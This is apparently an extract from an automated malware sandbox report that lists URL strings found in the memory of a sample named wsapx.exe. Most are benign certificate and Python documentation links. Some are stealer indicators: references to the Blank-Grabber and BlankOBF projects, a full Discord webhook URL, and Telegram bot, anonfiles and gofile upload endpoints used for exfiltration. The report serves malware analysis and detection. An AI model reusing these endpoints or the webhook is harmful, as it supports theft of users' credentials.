              Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: wsapx.exe, 00000000.00000003.2152239767.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: wsapx.exe, 00000000.00000003.2152239767.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000B.00000002.2263605331.000002A22AE69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000B.00000002.2263605331.000002A22AC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD3521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000B.00000002.2263605331.000002A22AE69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: wsapx.exe, 00000002.00000002.2655861700.000001C87A3B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: wsapx.exe, 00000002.00000003.2342123848.000001C879E0E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A528000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000B.00000002.2263605331.000002A22AC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD3521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: wsapx.exe, 00000002.00000003.2649750840.000001C87A0D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A528000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: wsapx.exe, 00000002.00000002.2655646494.000001C87A2A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPs
              Source: wsapx.exe, 00000002.00000003.2418159022.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421489362.000001C87A0C7000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2654490430.000001C87A0D8000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2649750840.000001C87A0D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2158361673.000001C879A7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: wsapx.exe, 00000002.00000002.2651928878.000001C8794D0000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: wsapx.exe, 00000002.00000002.2652231018.000001C879720000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: wsapx.exe, 00000002.00000002.2652231018.000001C879720000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: wsapx.exe, 00000002.00000002.2655646494.000001C87A310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: edb.log.23.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 00000017.00000003.2237389156.00000266ECFA0000.00000004.00000800.00020000.00000000.sdmp, edb.log.23.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: wsapx.exe, 00000002.00000003.2175226074.000001C87A147000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2175509272.000001C879D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: wsapx.exe, 00000002.00000003.2181268132.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2182287470.000001C879EBE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2183214516.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2180252331.000001C879D49000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2180078817.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: wsapx.exe, 00000002.00000002.2655646494.000001C87A310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: wsapx.exe, 00000002.00000003.2185307895.000001C87A029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/251
              Source: wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: wsapx.exe, 00000002.00000002.2655861700.000001C87A3B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 00000041.00000002.2442904993.000001FAD43FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C8798CB000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A0C3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879E7C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: wsapx.exe, 00000002.00000002.2654490430.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2418159022.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421963487.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2370327129.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A0C3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: wsapx.exe, 00000002.00000002.2653029394.000001C879D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
